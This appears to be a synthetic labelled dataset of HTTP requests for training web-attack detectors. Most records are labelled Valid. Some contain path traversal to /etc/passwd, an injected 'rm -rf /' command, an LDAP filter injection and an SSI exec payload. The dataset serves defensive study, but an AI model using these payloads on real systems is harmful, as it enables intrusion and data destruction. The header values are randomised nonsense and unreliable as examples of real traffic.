X-Forwarded-For: 108.113.52.240
X-Serial-Number: 0933416903549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2080
Start - Id: 29132
class: Valid
GET /ujnpwUedneti/zhttpwhJqc/rmeiocetsdth2ezuei/yeulhc8srtjr/rH-yRI5pcuAi4q.28PBW/VOOHBGB/nCQTYalMLNeaiUyBA/bvAkYH./dix42l6/Hes/rR6ckZ.pl?isilhl=n8RlAbAkCZ&l6rfu9nte=ntwe8ref&remeahtesd1h=025&hiEan=e7mnfoagrtz&easr=80648&bqahpotpr=Yudskebgjo HTTP/1.1
Host: 251.71.249.249
Connection: mexeo
Accept: audio/x-wav, video/quicktime;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 186.234.179.68
Cookie: 3zzeosIaihldmy=nyeh5risigt
Cookie2: $Version="566"
Date: Wed, 31 Dec 08 19:48:54 UTC
ETag: W/"B1-Hq3-tdE.0yKIGBz"
Expect: 9wpt=Fls4a
From: 9tlsAera@gi2n.org
If-Modified-Since: Thu, 13 Apr 06 04:15:59 UTC
If-Unmodified-Since: Mon, 06 Jun 05 20:20:36 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Mar 09 16:00:28 GMT
Max-Forwards: 6183
MIME-Version: 6.1
Pragma: De3mrh='enioessS'
Proxy-Authorization: Basic ZWVhaHJBZjc6b2Vzbw==
Authorization: NTLM aWllY2lsRGhOaGhtd3A2bm9lcGRveXRyckxzbGJzYWhkaGVmdGVObW5rZw==
Range: 60-,-6044,06657-
Referer: http://www.tmrana.uk/gncotm/elnArmi/smci/tlmrcB.sh
TE: deflate;q=0.1
Trailer: User-Agent
User-Agent: leekrFs8 (8okoju; jJ5OchVlH.; uUEulf; sOP_IHt; smhhCLO)
UA-CPU: MIPS
UA-Disp: 8585,7282,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 466x304
Via: HTTP/2.8 167.173.188.174
Transfer-Encoding: crfari
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 244.82.254.221
X-Serial-Number: 1881707
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 29132
Start - Id: 46026
class: PathTransversal
GET /gshtiv/C0EzJrDTsk4W/bjO.0q/tunkv8n/er1chaajpqiilbxemrn/85/9gDwh/yQbEZPJRRL/7l990ReorC/xOKZel_UI/f7ADYY3copy@/sswFttaneaibqE.msf?oyicoSm5So=md&ht9Seg=2572543&goir=1inserteth&yXGKDcgIAMWi=2&J07eZSF=itoas&v8cYateroo=nX.o5XQs&mureoKnw6ge=azdNeh&Skoe0Neagdnisyi=iB_oFS.czmK4 HTTP/1.1
Host: 207.186.109.15
Connection: ulart
Accept: application/*;q=0.6, video/*, video/mpeg
Accept-Charset: iso-8859-1;q=0.4, x-mac-arabic, iso-8859-5
Accept-Encoding: 
Accept-Language: \.\.\/\.\.\/etc\/passwd
Cache-Control: no-transform
Client-ip: 100.75.108.19
Cookie: oi=knlne8htha2;te7dobfg=5
Cookie2: $Version="6"
Date: Sat, 26 Aug 06 11:25:57 UTC
ETag: W/"i@2cdKd_4ft0aj1MXmjj"
From: eircind@aorae.fr
If-Modified-Since: Wed, 04 Mar 09 01:41:33 GMT
If-Unmodified-Since: Sun, 31 Dec 06 24:28:32 CET
If-Match: "dOYhxyiF8UECtjh@2mWu"
If-None-Match: *
If-Range: Fri, 19 Jun 09 06:32:08 CET
Max-Forwards: 17
Pragma: no-cache
Authorization: Digest realm
Referer: http://www.yltieuo.com/yRarteRd/reaipJ.tar
TE: trailers,gzip;q=0.8,gzip;q=0.4
User-Agent: Mozilla/6.9 (X11; U; SunOS sun4u 7.4; mr-e1; rv:3.8.1) Gecko/30553176
UA-OS: Windows NT
UA-Color: color16
Via: 7.1 www.anmleds.js:45
Transfer-Encoding: compress
Upgrade: SnetBt/9.0, lhEp/0.1
Warning: 793 www.tyrd.shtml "8ufoatiglFcqs3etd" "Mon, 28 Jan 08 03:54:45 UTC"
X-Forwarded-For: 20.101.217.179
----: --------------------

null

End - Id: 46026
Start - Id: 32863
class: Valid
POST /sSrgkoin/ariwDwgsoEMe/OUUO4XWt.cgi? HTTP/1.1
Content-Length: 149
Content-Language: lr,djis,ecs
Content-Encoding: deflate
Content-Location: /auomBwo/anhatlh/ulLca/aboee1.htm
Content-MD5: OEluVWd0eXBqYWFydE9yZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Apr 08 06:39:35 UTC
Last-Modified: Wed, 04 Jul 07 09:35:22 GMT
Host: www.jeog.org
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=1707
Client-ip: 50.137.205.249
Cookie: rim=s42swc;tcL1msay3=3891;Doemr=skh
Cookie2: $Version="37"
Date: Mon, 02 Nov 09 13:27:41 CET
ETag: W/"Awk6qeuwMq_gg-3SJY7w"
Expect: 100-continue
From: taoanoi@ags2rpme.org
If-Modified-Since: Sun, 19 Apr 09 06:30:28 GMT
If-Unmodified-Since: Sat, 12 Nov 05 23:31:45 CET
If-Match: "fLdDoXzzhXiyQQ4PQ"
If-None-Match: "yV.W5dr6y9UL6_nA"
If-Range: Tue, 22 May 07 21:37:56 CET
Max-Forwards: 083
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: 4Ws6te dne4t49h=yetlt8fh
Authorization: Basic bGZvem9POm5ncnM=
Range: 1223-85
Referer: /allastwd/a0eez/twspnhf.mpg
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 3.5; pf-xc; rv:1.8.2) Gecko/95202843
UA-CPU: PowerPC
UA-Disp: 523,5412,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 386x304
Via: 1.3 255.140.207.184, 7.7 214.40.116.43, az6sid/8.0 185.234.90.197
Transfer-Encoding: gzip
Upgrade: at3hnI/7.0, 3eo4/8.2, banehg/6.2, Ag8hoA/1.7, seT/3.4
Warning: 299 174.29.128.72 "setBezidiuloeuepNe" "Fri, 02 Jul 04 12:55:39 GMT"
X-Forwarded-For: 222.194.36.22
X-Serial-Number: 844313941
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wgetEZNi=cprejOaiRhviTe&AnIlmithnecaMul=623&ae4tlpcic8rC=216244&eTe5gRhdneoOt0=7&he6=ip3ueCh&istoxuntsldqyon=3202&otcsaeftn9f7i=erx&9Hmmoig=rapQpxWWD

End - Id: 32863
Start - Id: 8601
class: Valid
GET /7a3M9eeaTuedTDecxh/o4m6e-lPoSgNwP3/Sk2ntkcst/oiie/y46dvoebanoj/metavJsamiframe/jVwinntAprocessing-instruction0z/tj_r_cu5v/rtBN.swf? HTTP/1.0
Host: www.omsh.it
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-chinesetrad;q=0.7, windows-1252, windows-1257;q=0.2, windows-1257;q=0.6, windows-1255
Accept-Encoding: gzip
Accept-Language: *;q=0.8
Cache-Control: nsl=efknae
Client-ip: 60.92.206.219
Cookie: anwawemItj=xgswFdzvUd_;tERr=m;ortiSHuyd=Rwx 'td
Cookie2: $Version="36"
Date: Fri, 25 Apr 08 13:08:36 CET
ETag: W/"p52n56qNd8IpNMOYX11F"
Expect: 100-continue
From: nksese@ashwepa.org
If-Modified-Since: Mon, 28 Jun 04 23:00:03 GMT
If-Unmodified-Since: Wed, 01 Nov 06 12:02:38 CET
If-Match: "1ssZbbP0FEOLkBHNTM"
If-None-Match: "0DawXfJ5jJ-qqHrDbJ@L"
If-Range: "N4MC-iBqLn46fqQs"
Max-Forwards: 5
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic cmUxNWxpZTplZWVzbGN0YQ==
Authorization: Basic bWRFeG5hOm5hZ2FlZW9k
Range: 90141-597
Referer: /YvHaia/8opIhen/rattua5r.dll
TE: gzip;q=0.0,chunked,trailers
Trailer: Expect
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 9.6; at-l5; rv:7.5.9) Gecko/91110450
UA-CPU: 68000
UA-Disp: 692,9024,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 706x840
Via: rdnmiz/3.3 www.vnei.jpeg, 3.8 www.EnprtTeu.jpg
Transfer-Encoding: deflate
Upgrade: tnlctt/8.2
Warning: 294 www.tpriIw.html "evdBEd" 
X-Forwarded-For: 70.113.134.5
X-Serial-Number: 1101244
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8601
Start - Id: 25090
class: Valid
GET /eaed/skaKMhLhKj2/.ishutdownn5Th/sultE1o8a8qerzjsz.png? HTTP/1.0
Host: www.Iizhlasi.gov
Connection: dbfc
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: irhoe-h, i5-zcwftd;q=0.0, ebocd-8;q=0.4
Cache-Control: no-transform
Client-ip: 77.23.10.68
Cookie: iDetgcsDfawht=ttdcnceN;iivln=30e2weu8hlc;a9cp=m8t;eenjhiltrttHErc=15186
Cookie2: $Version="19"
Date: Sun, 13 Mar 05 15:43:23 UTC
ETag: W/"9lAb5g8ILPiDHQc4"
Expect: 100-continue
From: hixb@siilehs.org
If-Modified-Since: Tue, 01 May 07 24:41:48 UTC
If-Unmodified-Since: Sun, 17 Apr 05 20:14:53 GMT
If-Match: *
If-None-Match: *
If-Range: "dkcHP-5DGkXrpOhe"
Max-Forwards: 6364
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aWdycTA6YXRpYWFpbw==
Authorization: t1twoa toea=qEifmTk
Range: -382555,561-,08492-
Referer: /9oyHu39a/eicgcen9/cnCpoek.bin
TE: trailers,gzip
Trailer: Transfer-Encoding
User-Agent: heiadw (eDNRtnI; ec5_Wms-; tfYjxFzng)
UA-CPU: StrongARM
UA-Disp: 0466,0106,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 131x6281
Via: blOi75/9.1 www.txdsued.css, HTTP/5.1 57.122.41.207, FTP/8.0 www.iEgds.jpeg
Transfer-Encoding: identity
Upgrade: fHes0f/7.0
Warning: 642 253.124.12.232 "tnzgoO" "Wed, 21 Apr 04 07:49:37 UTC"
X-Forwarded-For: 64.157.250.51
X-Serial-Number: 714579
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25090
Start - Id: 15148
class: Valid
GET /mHUN/lvr6SNByCKCgc-0tb/IF2E/o0tOesEsikhh2/_MB5O-xd8/rhiacakFmhmrnane/oxpdelaisIe/iqrusaAoizsofgOny/dUwGY_iCYs.php? HTTP/1.0
Host: www.qenwpizn.de
Connection: cithpod
Accept: video/quicktime, video/quicktime;q=0.2, image/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 240.49.150.235
Cookie: 0biioetph=n-r@1Nq5I_
Cookie2: $Version="60"
Date: Fri, 23 Apr 04 04:53:00 CET
ETag: "0uLjov9Nslyl1Um57Gg"
Expect: thS2ch
From: fbsohcou@fT8svas.cz
If-Modified-Since: Fri, 08 Jun 07 15:22:17 GMT
If-Unmodified-Since: Fri, 23 Apr 04 07:53:36 UTC
If-Match: "mHAWrzrTGC_TYOrOI.."
If-None-Match: *
If-Range: *
Max-Forwards: 3074
MIME-Version: 6.2
Pragma: dTep=rAtuehro
Proxy-Authorization: Basic aW1laXA6dHFmZWRhcA==
Authorization: Digest nc=bDfA340d
Range: -96,366774-,-767
Referer: /anfh/SzakyeRx/6AyreAe.cgi
TE: gzip,trailers,chunked
Trailer: User-Agent
User-Agent: AteLm1i3d (rDNt_R; imoiT_X)
UA-CPU: 68000
UA-Disp: 0555,2366,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4259x4108
Via: 4.9 6.187.171.253, 3.8 www.mcgo6nd.png:29
Transfer-Encoding: identity
Upgrade: k0e/8.3, ee0yu1/6.5, csixbf/0.4
Warning: 853 www.Irfoniec.gif "balae9aEasdiral" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 28006910
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15148
Start - Id: 43078
class: OsCommanding
PUT /nIlPbQ40K.GJ1f5/intcinisseeee/aU.jGHlF-/dlee/likeU3-XwgetxUZX.htm? HTTP/1.1
Content-Length: 127
Content-Language: teeten,anti
Content-Encoding: identity
Content-Location: http://www.coact9.be/tvai/hsowcdhn/SbIes/aloi/eeRuiaSf.gz
Content-MD5: Znh0NGxidHNheXVpZnNuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 May 05 24:17:51 CET
Host: www.dOtienr0.uk
Connection: Zetlaghd
Accept: application/postscript;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, identity, compress, identity;q=0.3
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 56.53.104.65
Cookie: Vopeninput-lkK29=6138549;F0u3ifnqe=qewinntDe(a;osaosNttb9l=eiftutrfhno;awto3unals=hexcgttbodyiO
Cookie2: $Version="0"
Date: Sat, 03 May 08 05:41:42 GMT
ETag: W/"eMtiP-Ze0_ie0Pb27"
Expect: 100-continue
From: adlH@iwon.uk
If-Modified-Since: Sat, 05 Nov 05 05:24:27 CET
If-Unmodified-Since: Fri, 16 Sep 05 06:14:29 GMT
If-None-Match: "z-v_VeDmzp2WdrNt"
If-Range: "evnKTBNdJ-xv1QE"
Max-Forwards: 4061
Pragma: no-cache
Authorization: Basic YXNyaDp0cnB0Ng==
Range: 6369-838,-3833
Referer: /0soa9koi/a21u/sekrd/exnee/tnhteoc.nsf
Trailer: Pragma
User-Agent: dsoiObiTq (dIqbpV; nsWUAc)
UA-OS: Win98
Via: 7.1 168.214.180.167, aot/9.1 205.104.158.48
Transfer-Encoding: L1no
~~~~~: ~~~~~~~~~~~~~~~

y5=troeI&insdtliqo=`   rm -rf    /   `&uboshlc=0rSgies&aOtdC=desldAbhnmrd6s&sumlswrei8sdy2r=4933&1J.ipC@U@=teeid|oAarSi

End - Id: 43078
Start - Id: 38587
class: LdapInjection
GET /eMs.htm?p1RtstN=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&gliPlahnohgqfks=hA+e&teEey9htsb=uA&roy=iOtlgid&byeedNeiece8o9s=ayenceb&1sorrdt=6gjvE&oddeltiDadia=Da&hblHesiunussuge=lo&ti=n&2Zrin1W=eeex&ncep=q%2B HTTP/1.0
Host: www.pjca8bEca3.de
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.7, windows-1257;q=0.7, x-mac-japanese, hz-gb-2312, shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 41.219.136.17
Cookie: ny0uloro=eaetisndto2rtenn;oa6Ie1=2iB8_S;emya=1651213
Cookie2: $Version="7"
Date: Wed, 03 Jan 07 04:37:29 UTC
ETag: "-JtG7_R7TXsAf9DYaiP"
Expect: 100-continue
From: pyIBk@eedSVf1mn.cz
If-Modified-Since: Thu, 29 Jan 04 05:22:33 CET
If-Unmodified-Since: Thu, 15 Jan 04 11:46:10 GMT
If-Match: "yQrgc8kEKG2IWS1sTnse"
If-None-Match: *
If-Range: Tue, 03 Jun 08 04:02:42 GMT
Max-Forwards: 6534
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: Digest opaque="rseh"
Range: -348176
Referer: http://www.cao3e1t5.uk/qh2e/ktavf/chshrvTn/dcA1k.jpg
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.9 (Windows; U; WinNT 7.3; ir-lt; rv:0.0.0) Gecko/84871458
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7804x6342
Via: 9.8 167.229.87.76:39, 4.8 www.p3i9aErn.html, 3.0 61.3.245.253
Transfer-Encoding: compress
Upgrade: teh/3.7, eErn/1.4, yrgp42/8.0, 3Ets/1.6
Warning: 494 www.yte1Tn.shtml "iewe" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 379109696738614
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38587
Start - Id: 5977
class: Valid
PUT /Odrop-BNsock_streamftpuOkT/F2/5ulio1yc3m6h5avh/n8nyEenet/pwhd6uEixss6e4p/eIQrLIj0@/ox/u_gWGK/xS/cP6z9dg_Nn71RpQ31s.tiff? HTTP/1.0
Content-Length: 124
Content-Language: ese,vm,1s
Content-Encoding: gzip
Content-Location: http://ttofhp.fr/defade/rwry/h86elund.pl
Content-MD5: dkFpbmVJb210ZWV6aGR5bg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Mar 04 12:34:16 UTC
Last-Modified: Sat, 20 Dec 08 21:13:56 CET
Host: 193.80.65.232
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: compress, gzip;q=0.2, gzip, compress, gzip
Accept-Language: *;q=0.0
Cache-Control: min-fresh=927
Client-ip: 26.138.248.122
Cookie: bebllvdwtmer=114
Cookie2: $Version="0"
Date: Wed, 20 Jun 07 20:14:10 UTC
ETag: W/"cU7PSuHBpRlrODCr"
Expect: rr6iNl
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Mon, 15 May 06 21:12:06 UTC
If-Unmodified-Since: Tue, 20 Sep 05 05:36:05 CET
If-Match: *
If-None-Match: "PtvXhw6NIqDAkYygqJIl"
If-Range: "Pf@.f0-WjKnit5wi"
Max-Forwards: 149
MIME-Version: 8.3
Pragma: 4i=n3f
Proxy-Authorization: NTLM bkNuaXNvbGExYW1hdGlodHRzZUh3NG5jYmtvNWloT3RuYW0ydnNv
Authorization: Basic Tmxzcm55OmVtaHJ0
Range: 7772-71595
Referer: http://www.ossbn.ch/l6gis/ti1ibv/lZtni6/atml.txt
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.9 (compatible; stneaspm; SunOS sun4u; zm34uzs; pttyutroi)
UA-CPU: PowerPC
UA-Disp: 879,569,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 008x6801
Via: 5.7 www.hjTpb7gs.css, HTTP/9.6 www.xoeg5agt.html
Transfer-Encoding: identity
Upgrade: treana/1.3, oher5/3.1
Warning: 616 115.16.206.169:2 "ssgcrt2x" 
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 490268
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

QOxl9_zY=zDWz&HtejyeeicT=atp&ao3i=e&mmues=fQnKZHTL1GMI&c7sduh=nl2djsHhhfeeiis&iunagaoxotl=6&i5=exhrzete&sIostr=aseoc3am9aear

End - Id: 5977
Start - Id: 27368
class: Valid
GET /s5yZ/fdc85St/kp5n8P09beBd/oiondEcfsDseedqLre/g5rK/edeieitenWvkEq/aaianscaps/_xterm3TEO@fhj_.passthrua.js? HTTP/1.1
Host: 129.112.59.83:80
Connection: close
Accept: audio/basic
Accept-Charset: euc-tw, iso-8859-1, x-mac-icelandic
Accept-Encoding: *
Accept-Language: lasam-iiaels;q=0.4, sYpFmt-Rxk6Miwe;q=0.0, ttc2hw-vness, Rs4osZx-mhlcew
Cache-Control: max-age=7
Client-ip: 131.181.78.228
Cookie: weutsios8=594
Cookie2: $Version="46"
Date: Mon, 11 Aug 08 15:43:35 CET
ETag: "DmP6bpDpq88PUdj@T"
Expect: aiormnit=IdHrt6d;gaxsO
From: etr2@eeroi.de
If-Modified-Since: Tue, 24 May 05 17:07:08 GMT
If-Unmodified-Since: Sat, 20 Jun 09 05:06:44 CET
If-Match: *
If-None-Match: "PqQuZiauDwmJ@b149CaT"
If-Range: "HUngjKF@-sPQCc5Q"
Max-Forwards: 61
MIME-Version: 6.5
Pragma: iShh4oaw=che
Proxy-Authorization: MeYm toondn=clnamd
Authorization: lr3ld mLef=athsiaxc
Range: 5279-
Referer: http://www.4rhot.gov/hrci/efecl/l0nbsaoa/eadwrsnt/Mf5abea7.js
TE: gzip
Trailer: Expect
User-Agent: 9cDyX3hU http://www.5egna.net
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9698x542
Via: 5.7 www.AsrOnekt.png, 1.0 www.ctdhhrst.shtml, op7/8.1 169.33.178.69:4
Transfer-Encoding: deflate
Upgrade: uroe/2.4, Rrt/3.7
Warning: 505 www.pcahas.js "ilcsd5eeeoeahepuac" 
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 32684294
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27368
Start - Id: 7148
class: Valid
POST /r@KbTMQRxBIT0G8Y/0euphsDSem7/ldlgYMDwo-C7iNYJdhE/aitdtHesea3tOio/toe0ted/LeO2/6uees7osm/Eflocation/eteebrbrRIi/n0ke.aspx? HTTP/1.1
Content-Length: 167
Content-Language: sa
Content-Encoding: compress
Content-Location: /cHyssiao/8jbhy/tetpwdfS/gOteke/soaaw.cgi
Content-MD5: dWkzaXRjbmFuaDZhbXd0Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Aug 05 06:48:57 CET
Last-Modified: Sat, 17 Jul 04 12:37:57 UTC
Host: www.nluhsfo.biz
Connection: close
Accept: text/xml, image/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 176.188.0.84
Cookie: PhEei=4;iOmhiEemIhrtta=lteioins;robaueEpIm=hhrocki
Cookie2: $Version="67"
Date: Sat, 22 Oct 05 09:31:43 CET
ETag: W/"jT5Ukj.i20g0ZBB02"
Expect: 100-continue
From: kntoo@5rda2fql.com
If-Modified-Since: Sat, 16 Jun 07 13:23:09 CET
If-Unmodified-Since: Thu, 27 Nov 08 08:31:41 UTC
If-Match: *
If-None-Match: *
If-Range: "FgpUL_13bSQ0vq06"
Max-Forwards: 9
MIME-Version: 0.5
Pragma: attre=dsyhqn
Proxy-Authorization: Digest nc=063b82cf
Authorization: Digest qop=auth-int
Range: -6
Referer: http://www.joaks.fr/aiphrac.nsf
TE: trailers,gzip
Trailer: Pragma
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 9.0; tn-gc; rv:1.8.6) Gecko/82760086
UA-CPU: MIPS
UA-Disp: 4314,0778,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 849x6253
Via: FTP/5.4 www.ulneos.gif, FTP/4.0 163.99.176.5
Transfer-Encoding: compress
Upgrade: ecs3ms/8.7, i206fu/9.3, stsan/9.3
Warning: 454 www.foneu0k.js "qrteSieoenEaraosa" 
X-Forwarded-For: 229.243.169.191
X-Serial-Number: 73109423646427331
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o8kdgAssOs=ao7wma4modeislthdm&eteoyMeaeehtssx=>uulhutwpheegdye:t&omshrgswaIhl4e=9qqQzulT&7vu901p=N<dbqee&RLjrcp=sYc0O07Ofr&srmm=hytaiwfEs8w&asezs9dmeizre=tr2rcpn

End - Id: 7148
Start - Id: 20234
class: Valid
GET /a.UWT/eqobbpe8Hi/nqUm73rzAptjja.c/hcaTtssneEt/sO3J/uNPbl8RO.rauz10.s/rHMomiteiaet.php4?1N1jnxUL=isCfqct9sim&nte=31686157&5lobuE=nVpP&ei7th=s6&annoae=7155&nt5ixletyMw=pA3&mf7siusisR9w=icbiteriE HTTP/1.0
Host: 61.182.63.109:80
Connection: close
Accept: video/mpeg
Accept-Charset: gb2312, windows-1257;q=0.3, iso-8859-6;q=0.5, macintosh;q=0.5, isiri-3342;q=0.3
Accept-Encoding: gzip, compress;q=0.6, gzip;q=0.7, compress, gzip;q=0.1
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 73.16.169.130
Cookie: c3dlo=6491704;3Eboot.inihFJ@rE=hiAHB-;Eaptremo8t6s=9ohtacceszk;PRZbZElMN=ae0w=wo3Dinclude1dnodea;QMBO.0=7209;atfoumc0=iat4t
Cookie2: $Version="3"
Date: Tue, 25 Apr 06 07:29:07 UTC
ETag: W/"0PybIzozC7n.EMn"
Expect: nis9mYn
From: etqo@etyau.de
If-Modified-Since: Fri, 27 Nov 09 14:46:31 UTC
If-Unmodified-Since: Sun, 26 Apr 09 14:15:42 UTC
If-Match: *
If-None-Match: "cyzT8eWFKB6OSfMG"
If-Range: "ZvAvin9sLjDVtuvh"
Max-Forwards: 75
MIME-Version: 0.1
Pragma: i='rn1tRo'
Proxy-Authorization: NTLM aGhqb3NydGVobjZhdFhBMW90ZGtydDNyMmNFb2liSW5idG9uYUF5YmVjb2Vo
Authorization: Digest nc=DfBe6Eb5
Range: 8-0,-1872,-4
Referer: http://www.coatn.de/eISrfe/iha36/Sanrna/Tck1yne/osqahtR.swf
TE: gzip;q=0.0,trailers,gzip
Trailer: If-Match
User-Agent: neevmdenub8dlie
UA-CPU: MIPS
UA-Disp: 607,2187,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 566x725
Via: ttqln/6.9 210.25.46.203, FTP/8.3 44.91.125.89
Transfer-Encoding: rshE
Upgrade: tnge/6.2, iou/3.7, bt6/0.0, osnhrv/7.7
Warning: 624 80.190.32.100 "nxwnhoRO2aeltetuvxd6" "Fri, 14 Apr 06 17:56:57 GMT"
X-Forwarded-For: 210.165.164.74
X-Serial-Number: 554046996797250
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20234
Start - Id: 40297
class: SSI
GET /00a.php4?we1isoanxr3ala=fqwrT&gherdotn=36932430&eo5oht=24492&cttWh=seat&xi1iKf0nhIhan5a=mdaccess_log+includefromrm&kPPo0Ds2vC=5513&5lwnTlUvosl=zdocumentxweun0sftphtt+Tbwheref&Tfrscewnspes=er0dyb&QfbW2_z7h=bxiSwrnehtrdw&rhsm1m8=%3C%21--++++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5Cio%5CslduecUv%5CspHmm.exe+++++d%3A%5CEn%5Cwww.ilde.org%5C8ustef%5Cdatabase.mdb++++%2Fx++++exporttofoxpro%22--%3E&MfWu8=izf5etaaadk+rdat&KeiW91-MQ=nts0 HTTP/1.0
Host: 103.137.227.47
Connection: iogtJ4
Accept: image/png;q=0.5, image/png
Accept-Charset: iso-10646-ucs-2;q=0.6, windows-1258, euc-jp
Accept-Encoding: 
Accept-Language: f-3i;q=0.4
Cache-Control: no-cache
Client-ip: 191.44.132.121
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="9"
Date: Tue, 22 Nov 05 06:05:16 GMT
ETag: W/"cZahXkYy1L59OAb"
Expect: 100-continue
From: hgijw@pdtx8m.st
If-Modified-Since: Wed, 30 Dec 09 14:58:30 UTC
If-Unmodified-Since: Fri, 01 May 09 21:06:58 CET
If-Match: "yfOqlz-tLjgBz9y"
If-None-Match: *
If-Range: Thu, 22 Dec 05 07:20:42 CET
Max-Forwards: 3
MIME-Version: 7.8
Pragma: 2auntlen='r'
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Digest response="3f31C46cFe8c67aF5E5a5aF39FC6de6F"
Range: 5-
Referer: http://www.nr1n.net/gAoke/CIsgox/cwar/a1rraWub.tiff
TE: trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 8.4; On-Sa; rv:2.0.3) Gecko/23735716
UA-CPU: MIPS
UA-Disp: 2515,7751,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 7.4 9.228.109.107, 5.8 www.2olxmhsa.js
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40297
Start - Id: 6499
class: Valid
POST /RUJ/erIrndohelsm1oosn/Wu0pjTwaM/bvpMD1_F/mxmlf/c7W7HRU-/ayDsx5tU9h/rEnNinN/JcSRTLH2C/gaby2naeitoadi.shtml? HTTP/1.1
Content-Length: 60
Content-Language: pvveetn,ftlaeee,Mnoi6
Content-Encoding: identity
Content-Location: http://www.jtagrop.st/nLetr.jpg
Content-MD5: NHplaGV4Y2dyeHl0emplZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Apr 05 02:46:51 UTC
Last-Modified: Mon, 07 Jun 04 18:01:48 CET
Host: 224.6.64.158
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=88449
Client-ip: 68.59.6.250
Cookie: etn0hnbmneae=82572482
Cookie2: $Version="6"
Date: Fri, 07 Apr 06 09:19:38 GMT
ETag: "aCcVZMCRVWSpj9Zv-bf"
Expect: mrtp8s=nlieeuta;0h6t
From: s4epsqsd@rotiihceen.net
If-Modified-Since: Sun, 18 Jun 06 16:10:38 CET
If-Unmodified-Since: Sun, 02 Mar 08 15:00:53 UTC
If-Match: *
